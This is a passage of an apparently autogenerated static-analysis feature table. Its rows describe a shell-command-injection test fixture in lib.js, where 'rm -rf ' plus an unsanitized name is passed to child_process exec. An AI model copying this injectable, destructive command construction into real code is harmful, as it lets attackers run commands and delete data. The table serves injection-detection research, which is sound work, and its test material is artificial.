contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:3:519:9 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:3:519:9 | cp.exec | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:3:519:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:3:519:27 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:3:519:27 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:3:519:27 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:3:519:27 | cp.exec ... + name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:3:519:27 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:3:519:27 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:3:519:27 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:3:519:27 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:3:519:27 | exceptional return of cp.exec ... + name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:3:519:27 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:6:519:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:6:519:9 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:6:519:9 | exec | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:6:519:9 | exec | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:6:519:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:11:519:19 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:11:519:19 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:11:519:19 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:11:519:19 | "rm -rf " | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:11:519:19 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:11:519:19 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:11:519:26 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:11:519:26 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:11:519:26 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:11:519:26 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:11:519:26 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:11:519:26 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:11:519:26 | "rm -rf " + name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:11:519:26 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:11:519:26 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:23:519:26 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:23:519:26 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:23:519:26 | name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:23:519:26 | name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:23:519:26 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:23:519:26 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:3:521:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:3:521:4 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:3:521:4 | cp | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:3:521:4 | cp | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:3:521:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:3:521:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:3:521:9 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:3:521:9 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:3:521:9 | cp.exec | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:3:521:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:3:521:27 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:3:521:27 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:3:521:27 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:3:521:27 | cp.exec ... + name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:3:521:27 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:3:521:27 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:3:521:27 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:3:521:27 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:3:521:27 | exceptional return of cp.exec ... + name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:3:521:27 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:6:521:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:6:521:9 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:6:521:9 | exec | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:6:521:9 | exec | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:6:521:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:11:521:19 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:11:521:19 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:11:521:19 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:11:521:19 | "rm -rf " | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:11:521:19 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:11:521:19 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:11:521:26 | "rm -rf " + name | 